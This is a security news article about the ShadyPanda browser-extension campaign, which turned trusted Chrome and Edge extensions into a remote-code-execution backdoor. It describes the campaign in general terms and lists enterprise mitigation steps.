4.3M Users Exposed in ShadyPanda’s Long-Running Browser Hack

Millions of Chrome and Edge users spent years running hidden spyware, fooled by extensions that appeared safe and even Google-verified. 

Researchers found that a single threat actor, dubbed ShadyPanda, quietly built a multiyear operation that weaponized browser marketplaces and now potentially impacts more than 4.3 million users. 

What began as low-level affiliate fraud evolved into a sophisticated remote-code-execution (RCE) backdoor capable of full browser takeover.

The impacted browser extensions “… run hourly remote code execution – downloading and executing arbitrary JavaScript with full browser access,“ said Koi researchers.

The Multi-Phase Campaign Behind ShadyPanda’s Rise

ShadyPanda’s operation unfolded in deliberate stages. Early campaigns in 2023 deployed 145 extensions that masqueraded as wallpapers or simple productivity tools. 

These collected browsing data and injected affiliate codes into retail sites like Amazon and Booking[.]com. 

While not deeply technical, this phase taught the attackers how extension marketplaces review submissions, how users interpret trust signals, and how long benign-looking extensions can operate undetected.

A second wave in early 2024 became more aggressive. Extensions such as Infinity V+ hijacked search traffic, redirected queries through known browser hijackers, and exfiltrated cookies to attacker-controlled infrastructure. 

The extensions captured keystrokes in real time — including partial queries before they were submitted — giving ShadyPanda insight into user behavior at a granular level.

That’s when ShadyPanda switched tactics and began playing the long game.

The RCE Backdoor That Compromised Millions

ShadyPanda pivoted from short-term monetization to deep compromise. 

Extensions like Clean Master, uploaded as early as 2018, spent years building legitimacy — earning “Featured” and “Verified” badges from Google and accumulating hundreds of thousands of installs.

Only after gaining trust did the attackers push a malicious update in mid-2024. That single update delivered an hourly RCE backdoor, allowing remote servers to send arbitrary JavaScript into users’ browsers. 

The code executed with full access to browser APIs, letting ShadyPanda:

• Monitor every URL visited
• Collect timestamps, referrer paths, and navigation behavior
• Capture complete browser fingerprints
• Sync persistent identifiers across devices
• Exfiltrate encrypted data to attacker infrastructure

The malware also included anti-analysis checks, a custom JavaScript interpreter to evade detections, and the ability to intercept HTTPS traffic via service workers — enabling credential theft and content injection.

Mitigation Strategies for Extension-Driven Attacks

Because browser extensions can operate with high privilege by default, organizations must take a more proactive approach to monitoring, controlling, and hardening their browser ecosystems.

• Audit all installed browser extensions and remove any unnecessary, unvetted, or high-risk extensions with broad permissions.
• Enforce enterprise extension allowlists and use browser management tools to centrally control installation, updates, and permissions.
• Monitor for indicators of compromise by inspecting browser logs, service-worker activity, outbound traffic, and known ShadyPanda domains.
• Restrict or stage automatic extension updates to prevent trusted extensions from silently becoming malicious.
• Rebuild or reset compromised browser profiles and rotate all exposed credentials, tokens, and session cookies.
• Harden high-risk environments — especially developer workstations — using sandboxed browsing, hardware-based authentication, and secret-management tools.
• Integrate browser security into asset management and user training by tracking extension inventories and educating users on extension risks.

As browser extensions continue to play a central role in daily workflows, they also increase the attack surface. This makes proactive extension management essential for reducing enterprise risk.

The Hidden Trust Gap in Browser Extensions

ShadyPanda exploited a single systemic weakness for seven years: browser extension marketplaces only scrutinize code at the moment of submission. 

After approval, extensions gain implicit trust — receiving no continuous monitoring, no behavioral analysis, and almost no oversight of silent updates. 

This gap mirrors broader software supply chain risks, where attackers infiltrate trusted components and weaponize them long after initial review. 

Such unchecked trust underscores the need for a zero-trust approach, where every component is continuously validated rather than accepted by default.